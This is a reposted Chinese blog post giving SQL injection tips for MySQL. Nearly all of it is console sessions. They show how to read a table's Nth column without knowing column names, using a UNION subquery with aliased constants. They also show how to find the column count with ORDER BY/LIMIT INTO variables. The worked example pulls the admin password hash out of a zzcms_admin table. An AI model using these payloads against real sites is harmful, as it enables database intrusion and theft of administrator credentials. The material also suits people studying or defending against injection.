[转载]MySQL注入不知道列名的情况下获取第X列的数据

作者: Luan 分类: 转载 发布时间: 2017-06-22 10:17

出处:http://www.zcgonvh.com/post/injection_tips_non-field-names-injection-with-subquery.html

mysql> desc zzcms_admin;
+---------------+--------------+------+-----+---------+----------------+
| Field         | Type         | Null | Key | Default | Extra          |
+---------------+--------------+------+-----+---------+----------------+
| id            | int(11)      | NO   | PRI | NULL    | auto_increment |
| groupid       | int(11)      | YES  |     | NULL    |                |
| admin         | varchar(255) | YES  |     | NULL    |                |
| pass          | varchar(255) | YES  |     | NULL    |                |
| logins        | int(11)      | YES  |     | 0       |                |
| loginip       | varchar(255) | YES  |     | NULL    |                |
| lastlogintime | datetime     | YES  |     | NULL    |                |
| showloginip   | varchar(255) | YES  |     | NULL    |                |
| showlogintime | datetime     | YES  |     | NULL    |                |
+---------------+--------------+------+-----+---------+----------------+
9 rows in set (0.00 sec)

mysql> select c from(select 1 as a,2 as b,3 as c,4 as e,5 as f,6 as g,7 as h,8 a
s i,9 as j from. zzcms_admin where 1=2 union select * from. zzcms_admin)xxx;
+-------+
| c     |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mysql> select d from(select 1 as a,2 as b,3 as c,4 as d,5 as e,6 as f,7 as g,8 a
s h,9 as i from. zzcms_admin where 1=2 union select * from. zzcms_admin)xxx;
+----------------------------------+
| d                                |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+
1 row in set (0.00 sec)

mysql>

贴上另外一个可能要一起用上的小技巧,Order By X Limit后获取当前表的列数:

mysql> select * from  zzcms_admin order by 1 limit 0,1;
+----+---------+-------+----------------------------------+--------+-----------+
---------------------+-------------+---------------------+
| id | groupid | admin | pass                             | logins | loginip   |
 lastlogintime       | showloginip | showlogintime       |
+----+---------+-------+----------------------------------+--------+-----------+
---------------------+-------------+---------------------+
|  1 |       1 | admin | 21232f297a57a5a743894a0e4a801fc3 |      2 | 127.0.0.1 |
 2017-06-21 11:55:25 | 127.0.0.1   | 2017-06-20 14:43:37 |
+----+---------+-------+----------------------------------+--------+-----------+
---------------------+-------------+---------------------+
1 row in set (0.00 sec)

mysql> select * from  zzcms_admin order by 1 limit 0,1 union select 1,2,3,4,5,6,
7,8,9;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY
mysql> select * from  zzcms_admin order by 1 limit 0,1 into @1,@2,@3,@4,@5,@6,@7
,@8;
ERROR 1222 (21000): The used SELECT statements have a different number of column
s
mysql> select * from  zzcms_admin order by 1 limit 0,1 into @1,@2,@3,@4,@5,@6,@7
,@8,@9;
Query OK, 1 row affected (0.00 sec)

mysql>

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论